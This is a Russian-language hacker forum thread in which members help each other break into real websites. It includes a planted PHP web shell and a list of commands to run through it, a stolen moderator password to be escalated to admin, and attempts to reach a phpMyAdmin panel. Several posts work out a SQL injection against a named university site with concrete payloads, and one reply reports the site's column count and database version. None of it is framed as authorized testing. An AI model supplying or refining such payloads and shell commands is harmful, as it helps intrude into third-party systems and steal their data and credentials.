Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. downloader

    downloader New Member

    Joined:
    12 Sep 2008
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    попугай тама magic_quotes_on :( я бы залил с радастю снова :) но больше нету допуска залить... через system и с magic_quotes_on никак нельзя залить шелл? или может скачать все файлы?
     
  2. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    там *nix?
    Если да, то почитай конфиги и где то должна быть админка, етс...

    напомню:
    ls (ls -lia) --листинг диры
    pwd ---текущая дира
    cat file.php --открыть файл для просмотра (если не катит так, смотри ниже)
    cp file.php file.txt ---ну и потом прям в браузере смотрим сорцы
    rm file -- удалить файл (например мещающий хтакцесс)

    этих команд, в купе с твоим <? system($_GET[c]) ?> , хватит в 90% случаев.
     
  3. downloader

    downloader New Member

    Joined:
    12 Sep 2008
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    тама FreeBSD
     
  4. it's mу

    it's mу Banned

    Joined:
    12 Feb 2009
    Messages:
    47
    Likes Received:
    32
    Reputations:
    5
    фрибсд это никс система
     
    1 person likes this.
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    запрос не правильно составляешь либо прав не хватает
     
  6. SeCriVe

    SeCriVe Member

    Joined:
    18 Jan 2009
    Messages:
    10
    Likes Received:
    18
    Reputations:
    0
    Помогите с сайтом ucoz!
    Я заполучил пароль моддера ,можно ли с помошью этого получить пасс админа?
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Возможно у того узера от которого у тебя есть пасс не хватает грантов на изменения даных в той таблицы(базе) в которой ты хочешь внести изменинея.
     
  8. SeCriVe

    SeCriVe Member

    Joined:
    18 Jan 2009
    Messages:
    10
    Likes Received:
    18
    Reputations:
    0
    Блин xss в заголовке новости неробит(
     
  9. Tepp

    Tepp New Member

    Joined:
    6 Feb 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Вопрос:
    Хо4у залезть в phpmyadmin
    когда ввожу "http://ip/phpmyadmin" меня перекидывает на "http://google.ru/"
    Как в phpmyadmin в таком слу4ае можно попасть?
     
  10. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Што делоть если стоко сталпцоф.... -37+ORDER+BY+100000000000000000000+--
     
  11. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Кидай ссылку, посмотрим.
     
  12. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    Плакать)))
    А вообще проверь GROUP BY
    ЗЫ:Техника в руках не образованого - железо
     
  13. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    ht~tp://www.christuniversity.in/secmenudisp.php?MID=-37+GROUP+BY+100000000000000000000+--



    а вопше , кому не лен обесните... што нетак зделол ....
     
  14. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    www.christuniversity.in/secmenudisp.php?MID=37+group+by+1+--
    Один столбец
     
  15. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    ой .... не пинайте :)
     
  16. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    А почему при простом запросе union+select+1+-- пишеть што : The used SELECT statements have a different number of columns когда я точно узнал што чеголиш 1 столбец
     
    #5416 Saiga, 14 Feb 2009
    Last edited: 14 Feb 2009
  17. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    Tepp, на гугл может перекидывать, когда в адресе пробелы, но это наверно не тот случай...
     
  18. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    Saiga, значит там не один запрос к базе данных, подбирай дальше через union select
    p.s. не заметил, ты неправильно написал, не unin select, а UNION SELECT
     
    #5418 pinky07, 14 Feb 2009
    Last edited: 14 Feb 2009
  19. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    видемо мне ....

    2 pinky07 незнаю как далше .
     
  20. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    Saiga, заканчивай флудить и кидай ссылку.

    p.s. терпения не хватило подобрать количество столбцов, в таких случаях можно использовать подзапросы
    версия Mysql =4
    юзер бд:
    итд....

    // прочитай побольше статей
     
    #5420 pinky07, 14 Feb 2009
    Last edited: 14 Feb 2009
Thread Status:
Not open for further replies.